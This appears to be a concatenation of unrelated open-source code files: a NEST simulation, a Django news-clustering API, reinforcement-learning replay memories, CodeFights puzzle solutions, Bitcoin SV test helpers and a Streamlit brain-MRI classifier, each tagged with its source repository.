{'rule': 'pairwise_bernoulli',
'p': self.p_ex},
syn_spec={"weight": self.w_ex})
nest.Connect(self.noise, self.population, 'all_to_all',
syn_spec={"weight": self.w_noise})
nest.Connect(self.population, self.spike_det)
nest.Connect(self.voltmeter, self.population)
nest.SetStatus(self.voltmeter, [{"withgid": True}])
self.connected = True
def run(self):
"""
Simulate the model for simtime milliseconds and plot the
voltage trace and spike raster of the network during this period.
"""
if not self.connected:
self.connect()
nest.Simulate(self.simtime)
nest.voltage_trace.from_device(self.voltmeter)
nest.raster_plot.from_device(self.spike_det, hist=True)
plt.title('Population dynamics')
plt.show()
print(self.neuron_params)
NestModel(nest_params_path='/Users/vlasteli/Documents/Models/L5_TTPC1_cADpyr232_1/simulation/parameters/NESTParams.pck').run()
``` |
{
"source": "JimmyMVP/newsalyser",
"score": 2
} |
#### File: api/articles/models.py
```python
from django.db import models
from django.contrib.postgres.fields import ArrayField, JSONField
# Create your models here.
class Article(models.Model):
id = models.AutoField(primary_key=True)
brand = models.CharField(max_length = 600, blank = False)
title = models.CharField(max_length = 600, blank = False)
url = models.CharField(max_length = 600, blank = False, unique = True)
clustered = models.BooleanField(default = False)
added = models.DateTimeField(auto_now = True)
cluster = models.ForeignKey("Cluster", null = True)
json = JSONField()
category = models.CharField(max_length = 50, null = True)
top_taxonomy = models.CharField(max_length = 50, null = True)
tags = ArrayField(models.CharField(max_length = 30), null = True)
def __str__(self):
return str(self.json)
#Extracts top taxonomy and labels
def extract_top_taxonomy(self, taxonomy):
tags = []
firstLabel = taxonomy[0]["label"].split("/")[1:]
tags.extend(firstLabel[1:])
if(len(taxonomy) >= 2):
secondLabel = taxonomy[1]["label"].split("/")[1:]
if("confident" in taxonomy[1]):
tags.extend(secondLabel)
return tags
def __init__(self, *args, **kwargs):
# Tags can only be derived when the raw article json is supplied explicitly;
# instances loaded from the database are constructed with positional args.
if "json" in kwargs:
kwargs["tags"] = self.extract_top_taxonomy(kwargs["json"]["taxonomy"])
super().__init__(*args, **kwargs)
class Cluster(models.Model):
cluster_title = models.CharField(max_length = 200)
category = models.CharField(max_length = 50)
added = models.DateTimeField(auto_now = True)
def __str__(self):
return str(self.cluster_title)
```
#### File: api/articles/views.py
```python
from django.shortcuts import render
from rest_framework.renderers import JSONRenderer
from rest_framework.response import Response
from rest_framework.decorators import api_view, renderer_classes
from . import collect as nlp_collect
from .models import Article,Cluster
import json
@api_view(['GET'])
@renderer_classes((JSONRenderer,))
def root(request, format=None):
content = {'user_count': "hello"}
return Response(content)
@api_view(['GET'])
def collect(request, format=None):
content = "Collected data"
print("Collecting the data...")
json = nlp_collect.get_bingp()
for category in json:
nlp_collect.analyse(json[category])
return Response(content)
@api_view(['GET'])
@renderer_classes((JSONRenderer,))
def random(request, format=None):
print("Issuing random article...")
articles = Article.objects.order_by("added").values()
return Response(articles[0], headers = {"Access-Control-Allow-Origin" : "*"})
@api_view(['POST'])
@renderer_classes((JSONRenderer,))
def get_clusters(request, format=None):
print("Issuing clusters...")
print("Request" + str(request.body))
attribute_preferences = json.loads(request.body.decode("utf-8"))
clusters = Cluster.objects.values()
if("category" in attribute_preferences):
clusters = clusters.filter(category = attribute_preferences["category"])
if("num" in attribute_preferences):
clusters = clusters[:int(attribute_preferences["num"])]
if len(clusters) == 0:
return Response({"empty" : True})
return Response(clusters, headers = {"Access-Control-Allow-Origin" : "*"})
@api_view(['POST'])
@renderer_classes((JSONRenderer,))
def get_cluster(request, format=None):
print("Issuing cluster...")
print("Request" + str(request.body))
attribute_preferences = json.loads(request.body.decode("utf-8"))
print(attribute_preferences)
if "title" not in attribute_preferences:
return Response({"Error" : "I need the title of the cluster"})
articles = Article.objects.filter(cluster__cluster_title = attribute_preferences["title"]).values()
return Response(articles, headers = {"Access-Control-Allow-Origin" : "*"})
@api_view(['POST'])
@renderer_classes((JSONRenderer,))
def specific(request, format=None):
print("Issuing specific articles...")
print("Request" + str(request.body))
attribute_preferences = json.loads(request.body.decode("utf-8"))
articles = Article.objects.order_by("added").values()
if("num" in attribute_preferences):
articles = articles[:int(attribute_preferences["num"])]
if("category" in attribute_preferences):
articles = articles.filter(category = attribute_preferences["category"])
if len(articles) == 0:
return Response({"empty" : True})
return Response(articles, headers = {"Access-Control-Allow-Origin" : "*"})
```
#### File: newsalyser/server/scraper.py
```python
import newspaper
#Returns the urls of the articles in the news sites
def scrape(news_sites=[]):
urlmap = {}
for site in news_sites:
news = newspaper.build(site)
urlmap[site] = []
for article in news.articles:
urlmap[site].append(article.url)
print(urlmap)
return urlmap
``` |
{
"source": "JimmyMVP/plain_rl",
"score": 3
} |
#### File: torch_rl/memory/core.py
```python
from __future__ import absolute_import
from collections import deque, namedtuple
import warnings
import random
from typing import overload
import numpy as np
# [reference] https://github.com/matthiasplappert/keras-rl/blob/master/rl/memory.py
# This is to be understood as a transition: Given `state0`, performing `action`
# yields `reward` and results in `state1`, which might be `terminal`.
Experience = namedtuple('Experience', 'state0, goal, action, reward, state1, terminal1')
def sample_batch_indexes(low, high, size):
if high - low >= size:
# We have enough data. Draw without replacement, that is each index is unique in the
# batch. We cannot use `np.random.choice` here because it is horribly inefficient as
# the memory grows. See https://github.com/numpy/numpy/issues/2764 for a discussion.
# `random.sample` does the same thing (drawing without replacement) and is way faster.
try:
r = xrange(low, high)
except NameError:
r = range(low, high)
batch_idxs = random.sample(r, size)
else:
# Not enough data. Help ourselves with sampling from the range, but the same index
# can occur multiple times. This is not good and should be avoided by picking a
# large enough warm-up phase.
warnings.warn('Not enough entries to sample without replacement. Consider increasing your warm-up phase to avoid oversampling!')
batch_idxs = np.random.random_integers(low, high - 1, size=size)
assert len(batch_idxs) == size
return batch_idxs
class RingBuffer(object):
def __init__(self, maxlen):
self.maxlen = maxlen
self.start = 0
self.length = 0
self.data = [None for _ in range(maxlen)]
def __len__(self):
return self.length
def __getitem__(self, idx):
if idx < 0 or idx >= self.length:
raise KeyError()
return self.data[(self.start + idx) % self.maxlen]
@property
def last_idx(self):
return (self.length-1 + self.start)%self.maxlen
def append(self, v):
if self.length < self.maxlen:
# We have space, simply increase the length.
self.length += 1
elif self.length == self.maxlen:
# No space, "remove" the first item.
self.start = (self.start + 1) % self.maxlen
else:
# This should never happen.
raise RuntimeError()
self.data[(self.start + self.length - 1) % self.maxlen] = v
def pop(self, size):
if self.length-size <= 0:
raise Exception("This should not happen")
if self.start >= size:
self.start -= size
else:
self.length += self.start - size
self.start = 0
def __iter__(self):
# __getitem__ already maps logical indices onto the ring, so simply
# iterate from the oldest to the newest element.
for i in range(self.length):
yield self[i]
def clear(self):
self.start = 0
self.length = 0
def zeroed_observation(observation):
if hasattr(observation, 'shape'):
return np.zeros(observation.shape)
elif hasattr(observation, '__iter__'):
out = []
for x in observation:
out.append(zeroed_observation(x))
return out
else:
return 0.
class Memory(object):
def __init__(self, window_length=1, ignore_episode_boundaries=False):
self.window_length = window_length
self.ignore_episode_boundaries = ignore_episode_boundaries
self.recent_observations = deque(maxlen=window_length)
self.recent_terminals = deque(maxlen=window_length)
def sample(self, batch_size, batch_idxs=None):
raise NotImplementedError()
def append(self, observation, action, reward, terminal, training=True):
self.recent_observations.append(observation)
self.recent_terminals.append(terminal)
def get_recent_state(self, current_observation):
# This code is slightly complicated by the fact that subsequent observations might be
# from different episodes. We ensure that an experience never spans multiple episodes.
# This is probably not that important in practice but it seems cleaner.
state = [current_observation]
idx = len(self.recent_observations) - 1
for offset in range(0, self.window_length - 1):
current_idx = idx - offset
current_terminal = self.recent_terminals[current_idx - 1] if current_idx - 1 >= 0 else False
if current_idx < 0 or (not self.ignore_episode_boundaries and current_terminal):
# The previously handled observation was terminal, don't add the current one.
# Otherwise we would leak into a different episode.
break
state.insert(0, self.recent_observations[current_idx])
while len(state) < self.window_length:
state.insert(0, zeroed_observation(state[0]))
return state
def get_config(self):
config = {
'window_length': self.window_length,
'ignore_episode_boundaries': self.ignore_episode_boundaries,
}
return config
def clear(self):
for i in dir(self):
a = getattr(self, i)
if isinstance(a, RingBuffer):
a.clear()
elif isinstance(a, list):
# rebind the attribute itself; assigning to the local name would have no effect
setattr(self, i, [])
class EpisodeParameterMemory(Memory):
def __init__(self, limit, **kwargs):
super(EpisodeParameterMemory, self).__init__(**kwargs)
self.limit = limit
self.params = RingBuffer(limit)
self.intermediate_rewards = []
self.total_rewards = RingBuffer(limit)
def sample(self, batch_size, batch_idxs=None):
if batch_idxs is None:
batch_idxs = sample_batch_indexes(0, self.nb_entries, size=batch_size)
assert len(batch_idxs) == batch_size
batch_params = []
batch_total_rewards = []
for idx in batch_idxs:
batch_params.append(self.params[idx])
batch_total_rewards.append(self.total_rewards[idx])
return batch_params, batch_total_rewards
def append(self, observation, action, reward, terminal, training=True):
super(EpisodeParameterMemory, self).append(observation, action, reward, terminal, training=training)
if training:
self.intermediate_rewards.append(reward)
def finalize_episode(self, params):
total_reward = sum(self.intermediate_rewards)
self.total_rewards.append(total_reward)
self.params.append(params)
self.intermediate_rewards = []
@property
def nb_entries(self):
return len(self.total_rewards)
def get_config(self):
config = super(EpisodeParameterMemory, self).get_config()
config['limit'] = self.limit
return config
```
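A small sketch of the `RingBuffer` wrap-around behaviour defined above (the import path is assumed from the repository layout).
```python
from torch_rl.memory.core import RingBuffer  # assumed import path

buf = RingBuffer(maxlen=3)
for v in range(5):
    buf.append(v)                             # push 0..4 into a buffer of capacity 3

print(len(buf))                               # 3 -- the capacity is never exceeded
print([buf[i] for i in range(len(buf))])      # [2, 3, 4] -- the two oldest entries were overwritten
print(buf.last_idx)                           # position of the newest element in the underlying storage
```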
#### File: torch_rl/memory/hindsight.py
```python
from torch_rl.memory.core import *
class HindsightMemory(Memory):
"""
Implementation of replay memory for hindsight experience replay with future
transition sampling.
"""
def __init__(self, limit, hindsight_size=8, goal_indices=None, reward_function=lambda observation,goal: 1, **kwargs):
super(HindsightMemory, self).__init__(**kwargs)
self.hindsight_size = hindsight_size
self.reward_function = reward_function
self.hindsight_buffer = RingBuffer(limit)
self.goals = RingBuffer(limit)
self.actions = RingBuffer(limit)
self.rewards = RingBuffer(limit)
self.terminals = RingBuffer(limit)
self.observations = RingBuffer(limit)
self.limit = limit
self.last_terminal_idx = 0
self.goal_indices = goal_indices
def append(self, observation, action, reward, terminal, goal=None, training=True):
if training:
self.observations.append(observation)
self.actions.append(action)
self.rewards.append(reward)
self.terminals.append(terminal)
if goal is None:
goal = observation[self.goal_indices]
self.goals.append(goal)
if terminal:
"""
Generate hindsight transitions from the states added since the most recent terminal state.
"""
self.add_hindsight()
self.last_terminal_idx = self.goals.last_idx
super(HindsightMemory, self).append(observation, action, reward, terminal, training=True)
def __getitem__(self, idx):
if idx < 0 or idx >= self.nb_entries:
raise KeyError()
return self.observations[idx], self.goals[idx], self.actions[idx], self.rewards[idx], self.terminals[idx]
def pop(self):
"""
Remove the last hindsight_size elements because they were not
used to generate hindsight transitions.
"""
self.observations.pop(self.hindsight_size)
self.actions.pop(self.hindsight_size)
self.goals.pop(self.hindsight_size)
self.terminals.pop(self.hindsight_size)
self.rewards.pop(self.hindsight_size)
def add_hindsight(self):
for i in range(self.last_terminal_idx+1, self.observations.last_idx-self.hindsight_size):
# For every state in episode sample hindsight_size from future states
# hindsight_idx = sample_batch_indexes(i+1, self.observations.last_idx, self.hindsight_size)
hindsight_experience = (self.observations.last_idx - i - 1)*[None]
for j,idx in enumerate(range(i+1, self.observations.last_idx)):
hindsight_experience[j] = [i,idx]
self.hindsight_buffer.append(np.asarray(hindsight_experience))
def sample_and_split(self, num_transitions, batch_idxs=None, split_goal=False):
batch_size = num_transitions*self.hindsight_size + num_transitions
batch_idxs = sample_batch_indexes(0, self.hindsight_buffer.length, size=num_transitions)
state0_batch = []
reward_batch = []
goal_batch = []
action_batch = []
terminal1_batch = []
state1_batch = []
for idx in batch_idxs:
# Add hindsight experience to batch
hindsight_idxs = sample_batch_indexes(0, len(self.hindsight_buffer[idx]), self.hindsight_size)
for root_idx, hindsight_idx in self.hindsight_buffer[idx][hindsight_idxs]:
state0_batch.append(self.observations[hindsight_idx])
state1_batch.append(self.observations[hindsight_idx+1])
reward_batch.append(1.)
action_batch.append(self.actions[hindsight_idx])
terminal1_batch.append(self.terminals[hindsight_idx])
goal_batch.append(self.observations[hindsight_idx+1] if self.goal_indices is None else \
self.observations[hindsight_idx+1][self.goal_indices])
state0_batch.append(self.observations[root_idx])
state1_batch.append(self.observations[root_idx + 1])
reward_batch.append(self.rewards[root_idx])
action_batch.append(self.actions[root_idx])
terminal1_batch.append(self.terminals[root_idx])
goal_batch.append(self.goals[root_idx])
# Prepare and validate parameters.
state0_batch = np.array(state0_batch).reshape(batch_size,-1)
state1_batch = np.array(state1_batch).reshape(batch_size,-1)
terminal1_batch = np.array(terminal1_batch).reshape(batch_size,-1)
reward_batch = np.array(reward_batch).reshape(batch_size,-1)
action_batch = np.array(action_batch).reshape(batch_size,-1)
goal_batch = np.array(goal_batch).reshape(batch_size, -1)
if split_goal:
return state0_batch, action_batch, reward_batch, state1_batch, terminal1_batch, goal_batch
else:
state0_batch[:, self.goal_indices] = goal_batch
state1_batch[:, self.goal_indices] = goal_batch
return state0_batch, action_batch, reward_batch, state1_batch, terminal1_batch
@property
def nb_entries(self):
return len(self.observations)
from .sequential import GeneralisedMemory
class GeneralisedHindsightMemory(GeneralisedMemory):
"""
Implementation of replay memory for hindsight experience replay with future
transition sampling.
"""
def __init__(self, limit, hindsight_size=8, goal_indices=None, reward_function=lambda observation,goal: 1, **kwargs):
super(GeneralisedHindsightMemory, self).__init__(limit,**kwargs)
self.hindsight_size = hindsight_size
self.reward_function = reward_function
self.hindsight_buffer = RingBuffer(limit)
self.goals = RingBuffer(limit)
self.limit = limit
self.last_terminal_idx = 0
self.goal_indices = goal_indices
def append(self, observation, action, reward, terminal, extra_info=None,training=True, goal=None):
if training:
if goal is None:
goal = observation[self.goal_indices]
self.goals.append(goal)
if terminal:
"""
Sample hindsight_size of states added from recent terminal state to this one.
"""
self.add_hindsight()
self.last_terminal_idx = self.goals.last_idx
super(GeneralisedHindsightMemory, self).append(observation, action, reward, terminal, extra_info=extra_info, training=True)
def __getitem__(self, idx):
if idx < 0 or idx >= self.nb_entries:
raise KeyError()
return self.observations[idx], self.goals[idx], self.actions[idx], self.rewards[idx], self.terminals[idx]
def add_hindsight(self):
for i in range(self.last_terminal_idx+1, self.observations.last_idx-self.hindsight_size):
# For every state in episode sample hindsight_size from future states
# hindsight_idx = sample_batch_indexes(i+1, self.observations.last_idx, self.hindsight_size)
hindsight_experience = (self.observations.last_idx - i - 1)*[None]
for j,idx in enumerate(range(i+1, self.observations.last_idx)):
hindsight_experience[j] = [i,idx]
self.hindsight_buffer.append(np.asarray(hindsight_experience))
def sample_and_split(self, num_transitions, batch_idxs=None, split_goal=False):
batch_size = num_transitions*self.hindsight_size + num_transitions
batch_idxs = sample_batch_indexes(0, self.hindsight_buffer.length, size=num_transitions)
state0_batch = []
reward_batch = []
goal_batch = []
action_batch = []
terminal1_batch = []
state1_batch = []
extra_info = []
for idx in batch_idxs:
# Add hindsight experience to batch
hindsight_idxs = sample_batch_indexes(0, len(self.hindsight_buffer[idx]), self.hindsight_size)
for root_idx, hindsight_idx in self.hindsight_buffer[idx][hindsight_idxs]:
state0_batch.append(self.observations[hindsight_idx])
state1_batch.append(self.observations[hindsight_idx+1])
reward_batch.append(1.)
action_batch.append(self.actions[hindsight_idx])
# assumes the GeneralisedMemory base class exposes a `terminals` ring buffer
terminal1_batch.append(self.terminals[hindsight_idx])
goal_batch.append(self.observations[hindsight_idx+1] if self.goal_indices is None else \
self.observations[hindsight_idx+1][self.goal_indices])
extra_info.append(self.extra_info[hindsight_idx])
state0_batch.append(self.observations[root_idx])
state1_batch.append(self.observations[root_idx + 1])
reward_batch.append(self.rewards[root_idx])
action_batch.append(self.actions[root_idx])
terminal1_batch.append(self.terminals[root_idx])
goal_batch.append(self.goals[root_idx])
extra_info.append(self.extra_info[root_idx])
# Prepare and validate parameters.
state0_batch = np.array(state0_batch).reshape(batch_size,-1)
state1_batch = np.array(state1_batch).reshape(batch_size,-1)
terminal1_batch = np.array(terminal1_batch).reshape(batch_size,-1)
reward_batch = np.array(reward_batch).reshape(batch_size,-1)
action_batch = np.array(action_batch).reshape(batch_size,-1)
extra_info_batch = np.array(extra_info).reshape(batch_size,-1)
goal_batch = np.array(goal_batch).reshape(batch_size,-1)
if split_goal:
return state0_batch, action_batch, reward_batch, state1_batch, terminal1_batch, extra_info, goal_batch
else:
state0_batch[:, self.goal_indices] = goal_batch
state1_batch[:, self.goal_indices] = goal_batch
return state0_batch, action_batch, reward_batch, state1_batch, terminal1_batch, extra_info_batch
@property
def nb_entries(self):
return len(self.observations)
```
#### File: torch_rl/tests/ppo_test.py
```python
from unittest import TestCase
import pytest
import gym
import sys
import numpy as np
class PPOTest(TestCase):
@classmethod
def setup_class(cls):
""" setup any state specific to the execution of the given class (which
usually contains tests).
"""
cls.episode = 1
cls.T = 10
cls.env = gym.make('Pendulum-v0')
cls.gamma = .99
cls.lmda = .95
cls.def_reward = 1.
cls.def_value = 4.
def test_advantage_calculation(self):
values = np.zeros(self.T)
advantages = np.zeros(self.T)
rewards = np.zeros(self.T)
returns = np.zeros(self.T)
for i in range(self.T):
rewards[i] = self.def_reward
values[i] = self.def_value
lastgaelem = 0
for j in reversed(range(i)):
td = self.def_reward + values[j+1]*self.gamma - values[j]
A = lastgaelem = self.lmda * self.gamma * lastgaelem + td
advantages[j] = A
returns[j] = A + values[j]
print(advantages)
print(returns)
if __name__ == '__main__':
pytest.main([sys.argv[0]])
```
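The test above exercises the generalized advantage estimation (GAE) recursion, delta_t = r_t + gamma * V(s_{t+1}) - V(s_t) and A_t = delta_t + gamma * lambda * A_{t+1}. Below is a self-contained sketch of that recursion over a full trajectory; the constant rewards and values are purely illustrative and terminal masking is omitted.
```python
import numpy as np

def compute_gae(rewards, values, gamma=0.99, lmda=0.95, last_value=0.0):
    """Backward GAE pass over one trajectory (no terminal masking)."""
    T = len(rewards)
    advantages = np.zeros(T)
    lastgaelam = 0.0
    for t in reversed(range(T)):
        next_value = values[t + 1] if t + 1 < T else last_value
        delta = rewards[t] + gamma * next_value - values[t]
        lastgaelam = delta + gamma * lmda * lastgaelam
        advantages[t] = lastgaelam
    returns = advantages + values
    return advantages, returns

adv, ret = compute_gae(np.ones(10), np.full(10, 4.0))
print(adv)
print(ret)
```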
#### File: torch_rl/utils/start_tensorboard.py
```python
import glob
import subprocess
import os
import sys
from torch_rl.utils import init_parser, addarg, cmdl_args
from datetime import date
import time
import argparse
if __name__ == '__main__':
description = ("Starts tensorboard on all of the subdirectories in TRL_DATA_PATH unless"
" specified otherwise. The directory structure should be as follows:"
" TRL_DATA_PATH/EXPERIMENT_DIR/tensorboard, every directory should contain"
" a tensorboard directory with tensorboard logs.")
init_parser(description)
addarg('port', type=int, default=6006, info="port on which to start tensorboard")
addarg('work-dir', type=str, default=os.environ['TRL_DATA_PATH'], info="path to directory that contains the data")
addarg('reg', type=str, default=['*'], info="regex expressions to search for")
addarg('delta', type=str, default=None, info="modified since DELTA something ago. [d|m|h]NUM")
addarg('dry', type=bool, default=False, info="dry run")
addarg('time-info', type=bool, default=False, info="add timestamps to logdir labels")
def mtime_check(path, ds):
# timedelta only exposes .days, so convert the file age (in seconds) to the requested unit
age_seconds = time.time() - os.path.getmtime(path)
num = int(ds[1:])
if ds[0] == 'm':
delta = age_seconds / 60
elif ds[0] == 'h':
delta = age_seconds / 3600
elif ds[0] == 'd':
delta = age_seconds / 86400
else:
raise ValueError("delta must start with one of 'd', 'm' or 'h'")
return delta <= num
assert 'TRL_DATA_PATH' in os.environ, 'TRL_DATA_PATH has to be set in environment'
p = cmdl_args()
work_dir = p.work_dir
# Regex for files to run tensorboard with
regexes = p.reg
paths = []
logdir_string='--logdir='
for regex in regexes:
dirs = glob.glob(work_dir+'/'+regex)
paths.extend([os.path.abspath(x) for x in dirs])
if p.delta:
paths = list(filter(lambda x: mtime_check(x, p.delta), paths))
print("Num files:", len(paths))
if p.dry:
sys.exit(1)
for path in paths:
dirname = path.split("/")[-1]
date_prefix = ""
if p.time_info:
date_prefix = date.fromtimestamp(os.path.getmtime(path)).strftime("%Y-%d-%m")
if p.time_info:
logdir_string+= "{}{}:{},".format(date_prefix, dirname, os.path.join(path, 'tensorboard'))
else:
logdir_string+= "{}:{},".format(dirname, os.path.join(path, 'tensorboard'))
port_str = '--port='+str(p.port)
print(logdir_string)
subprocess.call(['tensorboard', logdir_string[:-1], port_str])
``` |
{
"source": "jimmynguyen/codefights",
"score": 3
} |
#### File: dfsComponentSize/python3/dfsComponentSize.py
```python
def dfsComponentSize(matrix, vertex):
stack = [vertex]
component = []
while stack:
v = stack.pop()
if v not in component:
component.append(v)
for w, connected in enumerate(matrix[v]):
if connected:
stack.append(w)
return len(component)
if __name__ == '__main__':
input0 = [[[False,True,False], [True,False,False], [False,False,False]], [[False,True,False,True], [True,False,False,False], [False,False,False,False], [True,False,False,False]], [[False,False,False], [False,False,False], [False,False,False]], [[False,True,False], [True,False,False], [False,False,False]], [[False,True,False,True], [True,False,True,False], [False,True,False,True], [True,False,True,False]]]
input1 = [0, 1, 0, 2, 2]
expectedOutput = [2, 3, 1, 1, 4]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
assert len(input1) == len(expectedOutput), '# input1 = {}, # expectedOutput = {}'.format(len(input1), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = dfsComponentSize(input0[i], input1[i])
assert actual == expected, 'dfsComponentSize({}, {}) returned {}, but expected {}'.format(input0[i], input1[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
```
#### File: differentRightmostBit/python3/differentRightmostBit.py
```python
from math import log2
def differentRightmostBit(n, m):
return 2**log2((n^m)&-(n^m))
if __name__ == '__main__':
input0 = [11, 7, 1, 64, 1073741823, 42]
input1 = [13, 23, 0, 65, 1071513599, 22]
expectedOutput = [2, 16, 1, 1, 131072, 4]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
assert len(input1) == len(expectedOutput), '# input1 = {}, # expectedOutput = {}'.format(len(input1), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = differentRightmostBit(input0[i], input1[i])
assert actual == expected, 'differentRightmostBit({}, {}) returned {}, but expected {}'.format(input0[i], input1[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
```
#### File: isInfiniteProcess/python3/isInfiniteProcess.py
```python
def isInfiniteProcess(a, b):
while a != b:
if (a > b):
return True
a += 1
b -= 1
return False
if __name__ == '__main__':
input0 = [2, 2, 2, 0, 3, 10, 5, 6, 10, 5]
input1 = [6, 3, 10, 1, 1, 10, 10, 10, 0, 5]
expectedOutput = [False, True, False, True, True, False, True, False, True, False]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
assert len(input1) == len(expectedOutput), '# input1 = {}, # expectedOutput = {}'.format(len(input1), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = isInfiniteProcess(input0[i], input1[i])
assert actual == expected, 'isInfiniteProcess({}, {}) returned {}, but expected {}'.format(input0[i], input1[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
```
#### File: isUppercase/python3/isUppercase.py
```python
def isUppercase(symbol):
return symbol >= 'A' and symbol <= 'Z'
if __name__ == '__main__':
input0 = ["A", "a", "0", "3", "-", "M", "x", "l", ".", "U"]
expectedOutput = [True, False, False, False, False, True, False, False, False, True]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = isUppercase(input0[i])
assert actual == expected, 'isUppercase({}) returned {}, but expected {}'.format(input0[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
```
#### File: largestNumber/python3/largestNumber.py
```python
def largestNumber(n):
return int('9'*n)
if __name__ == '__main__':
input0 = [2, 1, 7, 4, 3]
expectedOutput = [99, 9, 9999999, 9999, 999]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = largestNumber(input0[i])
assert actual == expected, 'largestNumber({}) returned {}, but expected {}'.format(input0[i], actual, expected)
```
#### File: metroCard/python3/metroCard.py
```python
def metroCard(lastNumberOfDays):
return [31] if lastNumberOfDays < 31 else [28, 30, 31]
if __name__ == '__main__':
input0 = [30, 31]
expectedOutput = [[31], [28, 30, 31]]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = metroCard(input0[i])
assert actual == expected, 'metroCard({}) returned {}, but expected {}'.format(input0[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
```
#### File: pagesNumberingWithInk/python3/pagesNumberingWithInk.py
```python
def pagesNumberingWithInk(current, numberOfDigits):
currentNumberOfDigits = len(str(current))
while numberOfDigits >= currentNumberOfDigits:
numberOfDigits -= currentNumberOfDigits
current += 1
currentNumberOfDigits = len(str(current))
return current-1
if __name__ == '__main__':
input0 = [1, 21, 8, 21, 76, 80]
input1 = [5, 5, 4, 6, 250, 1000]
expectedOutput = [5, 22, 10, 23, 166, 419]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
assert len(input1) == len(expectedOutput), '# input1 = {}, # expectedOutput = {}'.format(len(input1), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = pagesNumberingWithInk(input0[i], input1[i])
assert actual == expected, 'pagesNumberingWithInk({}, {}) returned {}, but expected {}'.format(input0[i], input1[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
```
#### File: percentageGreen/python2/percentageGreen.py
```python
def percentageGreen(green, total):
return float(green) / total * 100
if __name__ == '__main__':
input0 = [2, 4]
input1 = [5, 5]
expectedOutput = [40, 80]
assert len(input0) == len(expectedOutput), '# input0 = {}, # expectedOutput = {}'.format(len(input0), len(expectedOutput))
assert len(input1) == len(expectedOutput), '# input1 = {}, # expectedOutput = {}'.format(len(input1), len(expectedOutput))
for i, expected in enumerate(expectedOutput):
actual = percentageGreen(input0[i], input1[i])
assert actual == expected, 'percentageGreen({}, {}) returned {}, but expected {}'.format(input0[i], input1[i], actual, expected)
print('PASSES {} out of {} tests'.format(len(expectedOutput), len(expectedOutput)))
``` |
{
"source": "JimmyNLose/Sant_rOyOS_SV",
"score": 2
} |
#### File: test/functional/bsv_pbv_common.py
```python
from test_framework.util import wait_until
def wait_for_waiting_blocks(hashes, node, log):
oldArray = []
def should_wait():
nonlocal oldArray
blocks = node.getwaitingblocks()
if oldArray != blocks:
log.info("currently waiting blocks: " + str(blocks))
oldArray = blocks
return hashes.issubset(blocks)
wait_until(should_wait)
def wait_for_validating_blocks(hashes, node, log):
oldArray = []
def should_wait():
nonlocal oldArray
blocks = node.getcurrentlyvalidatingblocks()
if oldArray != blocks:
log.info("currently validating blocks: " + str(blocks))
oldArray = blocks
return hashes.issubset(blocks)
wait_until(should_wait)
def wait_for_not_validating_blocks(hashes, node, log):
oldArray = []
def should_wait():
nonlocal oldArray
blocks = node.getcurrentlyvalidatingblocks()
if oldArray != blocks:
log.info("currently validating blocks: " + str(blocks))
oldArray = blocks
return hashes.isdisjoint(blocks)
wait_until(should_wait)
``` |
{
"source": "Jimmy-Nnilsson/StudieGrupp3_MLProjekt",
"score": 3
} |
#### File: poc/streamlit_files/BE.py
```python
import streamlit as st
from PIL import Image
import numpy as np
from streamlit import caching
import pathlib
import os
import time
# from BEX_utils_animal import dummy_model
from pre_process_cropping_AP import BEX_cropping
from utils import *
def main():
st.sidebar.image("bex_cube_certified.png", use_column_width=True)
add_selectbox = st.sidebar.selectbox("Machine model operations",("Home screen","Evaluate image", "View Model data"))
if add_selectbox == "Home screen":
st.write("# Lets empower your brain!")
st.image('HS_brain_scan.jpg', width = 300)
# ---------------------------------------------------
if add_selectbox == "Evaluate image":
st.write("# Lets analyse your brain")
filename = st.file_uploader(label = 'Drag and drop file (image of brain MRI) to examine')
if add_selectbox == "Evaluate image":
if st.button("Put model to work!"):
if filename is not None:
get_path = os.getcwd()
src_path = pathlib.Path(get_path)
comp_path = src_path / filename.name # issues with streamlit and path
image = Image.open(filename)
img_array = np.array(image)
# st.write((np.stack(img_array,img_array, axis=2).shape))
# pipelining for size and cropping
# obj = BEX_cropping(comp_path)
obj = BEX_cropping()
st.write(filename.name)
np_croppped = obj.calculate_cropping(img_array)
#st.image(np_croppped)
pred = model.predict(np_croppped)
result_str = ""
if pred < 0.5:
pct = (0.5 - pred[0][0]) * 2
else:
pct = (pred[0][0] - 0.5)*2
result_str = f"{CLASSES[int(pred+0.5)]} with {round(pct*100, 1)}% certainty"
#st.write(f"pred output:{round(pred[0][0], 3)}")
image, heatmap, superimposed_img = model.grad_cam(np_croppped)
col11, col12, col13 = st.columns(3)
with col11:
st.write("Original picture")
st.image(image)
with col12:
st.write("With heatcam overlay")
st.image(superimposed_img)
with col13:
st.write("Heatcam")
uint_heatmap = (np.uint8(255 * heatmap))
st.image(cv2.applyColorMap(uint_heatmap, cv2.COLORMAP_OCEAN))
st.write(result_str)
# ---------------------------------------------------
if add_selectbox == "View Model data":
st.write("# Metrics and stuff")
col1, col2 = st.columns(2)
with col1:
image = Image.open("train_eval.png")
